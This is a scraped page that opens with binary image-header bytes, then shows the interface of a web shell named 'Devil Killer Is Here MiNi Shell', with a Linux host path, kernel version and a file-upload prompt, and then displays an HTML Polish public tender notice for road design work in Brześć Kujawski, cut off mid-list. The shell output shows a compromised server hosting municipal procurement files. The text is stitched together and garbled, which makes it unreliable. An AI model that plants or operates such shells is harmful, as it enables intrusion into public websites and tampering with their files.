JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250613/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250613/0027789301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie kompletnej dokumentacji projektowo-kosztorysowej <br/>na budowę i przebudowę dróg w gminie Brześć Kujawski </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BRZEŚĆ KUJAWSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866815</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Władysława Łokietka 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brześć Kujawski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-880</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@brzesckujawski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.brzesckujawski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie kompletnej dokumentacji projektowo-kosztorysowej <br/>na budowę i przebudowę dróg w gminie Brześć Kujawski </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d1728d9a-f050-4ca6-9248-6de055c8a6c8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00277893</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00003140/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Opracowanie kompletnej dokumentacji projektowo-kosztorysowej na budowę i przebudowę dróg w gminie Brześć Kujawski</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-propublico.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa następujące<br/>wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z<br/>Platformy:<br/>a) stały dostęp do sieci Internet;<br/>b) posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail),<br/>c) komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux,<br/>d) zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi,<br/>stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft<br/>Edge, Mozilla Firefox, Google Chrome, Opera),<br/>e) włączona obsługa JavaScript oraz Cookies.<br/>Zamawiający dopuszcza następujący format przesyłanych danych: pliki w formatach określonych<br/>odpowiednimi przepisami prawa, tj. m.in.: .doc, .docx, .txt, .xls, .xlsx, .ppt, .csv, .pdf, .jpg, .git, .png, .tif,<br/>.dwg, .ath, .kst, .zip, .rar, przy czym zaleca się wykorzystywanie plików w formacie .pdf, .doc, .docx.,<br/>.xlsx, .xml. Maksymalny rozmiar pojedynczego pliku to 80 MB, przy czym nie określa się limitu liczby plików.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że;<br/>1) udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków<br/>skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o<br/>których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie;<br/>2) udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych<br/>osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych<br/>ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub<br/>światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych,<br/>danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych<br/>dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku<br/>postępowania o udzielenie zamówienia;<br/>3) w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego,<br/>z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do<br/>uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące,<br/>prawem Wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w<br/>art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od administratora kopii<br/>danych osobowych podlegających przetwarzaniu), Zamawiający może żądać od osoby występującej z<br/>żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia;<br/>4) skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia, o którym mowa w<br/>art. 16 RODO (uprawnienie do sprostowania lub uzupełnienia danych osobowych), nie może naruszać<br/>integralności protokołu postępowania oraz jego załączników.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym<br/>mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania;<br/>2) w przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BI.II.271.17.2025.NŻ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Temat: Opracowanie kompletnej dokumentacji projektowo-kosztorysowej na budowę i przebudowę dróg w gminie Brześć Kujawski – część 1<br/>Wspólny Słownik Zamówień: <br/>71320000-7 - Usługi inżynieryjne w zakresie projektowania, <br/>71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów <br/>Opis: Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji projektowo-kosztorysowej dotyczącej budowy i przebudowy dróg w gminie Brześć Kujawski. <br/>1. Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej dla następujących inwestycji:<br/>1.1. Budowa dróg wewnętrznych w m. Falborz<br/>•	Lokalizacja: Działki współwłasnościowe 041804_5.0005–0007 (Falborz Kolonia i Parcele).<br/>•	Wymagania: Nawierzchnia z kostki brukowej, odwodnienie (rowy lub przepusty), uzgodnienia z współwłaścicielami gruntów.<br/>•	Uwagi formalne: Konieczność analizy potrzeby procedury ZRID <br/>w przypadku przekroczenia istniejącego pasa drogowego.<br/><br/>1.2. Przebudowa ul. Zielonej i Kamiennej w Wieńcu<br/>•	Lokalizacja: Działki w obrębie Wieniec (TERYT 041804_5.0027).<br/>•	Wymagania: <br/>- Nawierzchnia z kostki brukowej.<br/>-	Szerokość jezdni min. 3,5 m (z możliwością korekty przez projektanta).<br/>-	Odwodnienie: Rowy lub drenaż – projektant analizuje warunki terenowe.<br/>1.3. Budowa dróg w Brześciu Kujawskim<br/>•	Ulice: Archeologów, Książąt Kujawskich, Dominikanów, Królowej Jadwigi, Kazimierza Wielkiego.<br/>•	Lokalizacja: Działki 041804_4.0001–0006 (obręb M. Brześć Kuj. 1).<br/>•	Wymagania:<br/>- Nawierzchnia z kostki brukowej.<br/>-	Szerokość jezdni min. 3,5 m (z możliwością korekty przez projektanta).<br/>-	Analiza konieczności kanału technologicznego dla ul. Królowej Jadwigi po weryfikacji art. 39 ust. 6ba Ustawy o drogach publicznych.<br/>-	Oświetlenie LED.<br/>-	Odwodnienie: Rowy lub drenaż – projektant analizuje warunki terenowe.<br/>1.4. Przebudowa drogi Wieniec–Kąty i ul. Leśnej<br/>•	Lokalizacja: Działka 041804_5.0010 (Wieniec).<br/>•	Wymagania:<br/>- Nawierzchnia z kostki brukowej.<br/>-	Poszerzenie jezdni z 2,8 m do 3,5 m.<br/>-	Oświetlenie LED uwzględniające kolizję z siecią wodociągową.<br/>1.5. Budowa drogi wewnętrznej w m. Stary Brześć<br/>•	Lokalizacja: Działka 041804_5.0026.<br/>•	Wymagania:<br/>- Nawierzchnia z kostki brukowej.<br/>-	Szerokość jezdni min. 3,5 m (z możliwością korekty przez projektanta).<br/>-	Odwodnienie.<br/>-	Oświetlenie LED.<br/>1.6. Budowa drogi wewnętrznej w m. Wieniec Zalesie<br/>•	Lokalizacja: Działka 041804_5.0003.<br/>•	Wymagania:<br/>-	Nawierzchnia z kostki brukowej.<br/>-	Szerokość jezdni min. 3,5 m (z możliwością korekty przez projektanta).<br/>-	Oświetlenie LED.<br/>1.7. Budowa drogi ul. Krakowska<br/>•	Lokalizacja: Działka 041804_1.0285/5 w obrębie 0001 Miasto Brześć Kujawski<br/>•	Wymagania:<br/>-	Nawierzchnia z kostki brukowej.<br/>-	Szerokość jezdni min. 3,5 m (z możliwością korekty przez projektanta).<br/>-	Oświetlenie LED.<br/>Zakres zamówienia obejmuje: <br/>1. Dokumentację projektową,<br/>2. Dokumentację badań podłoża gruntowego.<br/>3. Kosztorys inwestorski i ofertowy,<br/>4. Przedmiar robót,<br/>5. Szczegółowa specyfikacja techniczna wykonania i odbioru robót.<br/>6. Uzgodnienia z gestorami sieci (w tym m.in. sieci energetycznej, wodociągowej, kanalizacyjnej, telekomunikacyjnej, gazowej),<br/>7. Uzyskanie wszelkich niezbędnych pozwoleń administracyjnych.<br/>2. Wymagania ogólne<br/>•	Minimalna szerokość jezdni: 3,5 m (z możliwością korekty przez projektanta).<br/>•	Materiały: Kostka brukowa.<br/>•	Odwodnienie: Projektowane indywidualnie dla każdej drogi (rowy, przepusty, drenaż).<br/>•	Oświetlenie: Obowiązkowe dla dróg nr 3, 4, 5, 6 i 7 – system LED.<br/>•	Doświetlenie ewentualnych przejść dla pieszych.<br/>3. Wymagania formalno-prawne<br/>•	Decyzje administracyjne:<br/>-	Zgłoszenie robót budowlanych dla dróg w istniejącym paśmie drogowym.<br/>-	Pozwolenie na budowę lub ZRID dla dróg na działkach współwłasnościowych (np. Falborz).<br/>•	Uzgodnienia:<br/>-	Z gestorami sieci (gaz, energia, woda) – obowiązkowe dla wszystkich kolizji.<br/>-	Z GDDKiA dla dróg przecinających DK62.<br/>•	Harmonogram:<br/>-	Termin realizacji dokumentacji: 30.06.2026 r.<br/>-	Aktualizacja kosztorysów: 2 razy w ciągu 24 miesięcy.<br/>4. Dodatkowe informacje.<br/>•	System odwadniania: Projektant samodzielnie określa rozwiązania techniczne, uwzględniając brak kanalizacji deszczowej przy ul. Królowej Jadwigi.<br/>• Projektant zobowiązany jest do weryfikacji danych oraz uwzględnienia stref ochrony konserwatorskiej przy ul. Archeologów, Książąt Kujawskich, Dominikanów oraz Królowej Jadwigi.<br/>•	Gwarancja: 24 miesiące od odbioru dokumentacji.<br/>5. Uwagi końcowe<br/>	Wszelkie zmiany w harmonogramie wymagają uzgodnienia <br/>z Zamawiającym.<br/>	Dokumentacja musi być przygotowana zgodnie z obowiązującymi przepisami prawa budowlanego oraz innymi regulacjami związanymi <br/>z projektowaniem i realizacją inwestycji drogowych.<br/>	Granice pasa drogowego winny zostać zbadane przez uprawnionego geodetę na etapie sporządzania mapy do celów projektowych.<br/>	Wykonawca winien uzyskać aktualne mapy sytuacyjno-wysokościowe z inwentaryzacją istniejącej infrastruktury.<br/>Informacje dotyczące oferty wariantowej, o której mowa w art. 92 ustawy Pzp: Zamawiający nie dopuszcza składania ofert wariantowych. <br/>Dokumentacja graficzna załączona do SWZ ma wyłącznie charakter poglądowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty przyznane przez każdego z członków Komisji przetargowej zostaną zsumowane dla każdego z<br/>kryteriów oddzielnie. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Temat: Opracowanie kompletnej dokumentacji projektowo-kosztorysowej na budowę i przebudowę dróg w gminie Brześć Kujawski – część 2<br/>Wspólny Słownik Zamówień: <br/>71320000-7 - Usługi inżynieryjne w zakresie projektowania, <br/>71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów <br/>Opis: Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji projektowo-kosztorysowej dotyczącej budowy i przebudowy dróg w gminie Brześć Kujawski.<br/>1. Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej dla następujących inwestycji:<br/>1.1. Budowa ścieżki rowerowej Falborz–Stary Brześć<br/>•	Lokalizacja: Działki współwłasnościowe 041804_5.0005–0007 (Falborz Parcele) oraz działki wzdłuż drogi powiatowej nr 2906C.<br/>•	Wymagania:<br/>-	Nawierzchnia: ekologiczny asfalt.<br/>-	Szerokość: min. 2,5 m z poboczami.<br/>-	Oświetlenie LED.<br/>-	Odwodnienie: Rowy przydrożne lub przepusty – projektant ustala rozwiązanie po analizie terenu.<br/>•	Uwagi formalne: Konieczność procedury ZRID i uzgodnienia <br/>z zarządcą drogi powiatowej nr 2906C.<br/>• Kładka pieszo-rowerowa na rzece Zgłowiączce na Falborzu jest zaprojektowana odrębnym opracowaniem. <br/>• Usytuowanie ścieżki rowerowej zlokalizowanej wzdłuż drogi wojewódzkiej nr DW270 jest jest uzależnione od od szerokości pasa drogowego i będzie się ona znajdować w pasie drogi wojewódzkiej bądź <br/>na terenie przyległym<br/>1.2. Budowa drogi gminnej Brzezie–Dubielewo–Gustorzyn<br/>•	Lokalizacja: Działki obrębu Brzezie (041804_5.0021–0023).<br/>•	Wymagania:<br/>-	Nawierzchnia: asfalt ekologiczny.<br/>-	Chodnik: Kostka brukowa (szer. 1,5 m) z obniżonymi krawężnikami.<br/>-	Odwodnienie: Projektant uwzględnia brak kanalizacji deszczowej <br/>w Dubielewie.<br/>1.3. Przebudowa drogi Brześć Kujawski–Miechowice<br/>•	Lokalizacja: Działki 041804_4.0010–0015 (obręb M. Brześć Kuj. 1).<br/>•	Wymagania:<br/>-	Nawierzchnia: asfalt ekologiczny + ścieżka rowerowa z materiałów <br/>z recyklingu.<br/>-	Oświetlenie LED .<br/>1.4. Budowa ścieżki rowerowej w m. Rzadka Wola<br/>•	Lokalizacja: Działki 041804_5.0080–0082 (Rzadka Wola).<br/>•	Termin realizacji: 30.09.2025.<br/>•	Wymagania: Nawierzchnia ekologiczny asfalt.<br/>1.5. Przebudowa drogi Wieniec–Lipiny<br/>•	Lokalizacja: Działki 041804_5.0034–0036 (Lipiny).<br/>•	Uwagi formalne: Konieczność uregulowania statusu prawnego gruntów prywatnych (trwają prace gminy).<br/>1.6. Przebudowa dróg w m. Rzadka Wola Parcele<br/>- Lokalizacja: działki 041804_5.0090, 041804_5.0091, 041804_5.0092 (Rzadka Wola Parcele)<br/>-	Nawierzchnia: asfalt ekologiczny.<br/>-	Szerokość jezdni: min. 3,5 m (dostosowana przez projektanta).<br/>-	Odwodnienie: Rowy lub drenaż – projektant analizuje warunki terenowe.<br/>1.7. Przebudowa drogi w m. Falborek<br/>-	Lokalizacja: działki 041804_5.0065, 041804_5.0066 (Falborek)<br/>-	Nawierzchnia: asfalt ekologiczny.<br/>-	Szerokość jezdni: min. 3,5 m (dostosowana przez projektanta).<br/>-	Odwodnienie: Rowy lub drenaż – projektant analizuje warunki terenowe.<br/>1.8. Budowa drogi wewnętrznej w m. Machnacz<br/>-	Lokalizacja: działki 041804_5.0045, 041804_5.0046 (Machnacz)<br/>-	Nawierzchnia: asfalt ekologiczny.<br/>-	Szerokość jezdni: min. 3,5 m (dostosowana przez projektanta).<br/>-	Odwodnienie: Rowy lub drenaż – projektant analizuje warunki terenowe.<br/>1.9. Przebudowa drogi w m. Starobrzeska Kolonia<br/>-	Lokalizacja: działki 041804_5.0075, 041804_5.0076 (Starobrzeska Kolonia)<br/>-	Nawierzchnia: asfalt ekologiczny.<br/>-	Szerokość jezdni: min. 3,5 m (dostosowana przez projektanta).<br/>-	Odwodnienie: Rowy lub drenaż – projektant analizuje warunki terenowe.<br/>1.10. Przebudowa drogi ul. Szkolna w m. Brześć Kujawski<br/>-	Lokalizacja: działki 041804_1.0015, 041804_1.0016 (Miasto Brześć Kujawski)<br/>-	Nawierzchnia: asfalt ekologiczny.<br/>-	Szerokość jezdni: min. 3,5 m (dostosowana przez projektanta).<br/>-	Odwodnienie: Rowy lub drenaż – projektant analizuje warunki terenowe.<br/>1.11. Budowa drogi ul. Mickiewicza do osiedla Falborek<br/>•	Lokalizacja: Działki przyległe do osiedla Falborek (obręb 041804_5.0004).<br/>•	Wymagania: <br/>- Nawierzchnia z kostki brukowej.<br/>-	Szerokość jezdni min. 3,5 m (z możliwością korekty przez projektanta).<br/>- Analiza konieczności kanału technologicznego po weryfikacji art. 39 ust. 6ba Ustawy o drogach publicznych.<br/>Zakres zamówienia obejmuje: <br/>1. Dokumentację projektową,<br/>2. Dokumentację badań podłoża gruntowego.<br/>3. Kosztorys inwestorski i ofertowy,<br/>4. Przedmiar robót,<br/>5. Szczegółowa specyfikacja techniczna wykonania i odbioru robót.<br/>6. Uzgodnienia z gestorami sieci (w tym m.in. sieci energetycznej, wodociągowej, kanalizacyjnej, telekomunikacyjnej, gazowej),<br/>7. Uzyskanie wszelkich niezbędnych pozwoleń administracyjnych.<br/>2. Wymagania ogólne<br/>•	Minimalna szerokość jezdni: 3,5 m (z możliwością korekty przez projektanta).<br/>•	Materiały: asfalt ekologiczny<br/>•	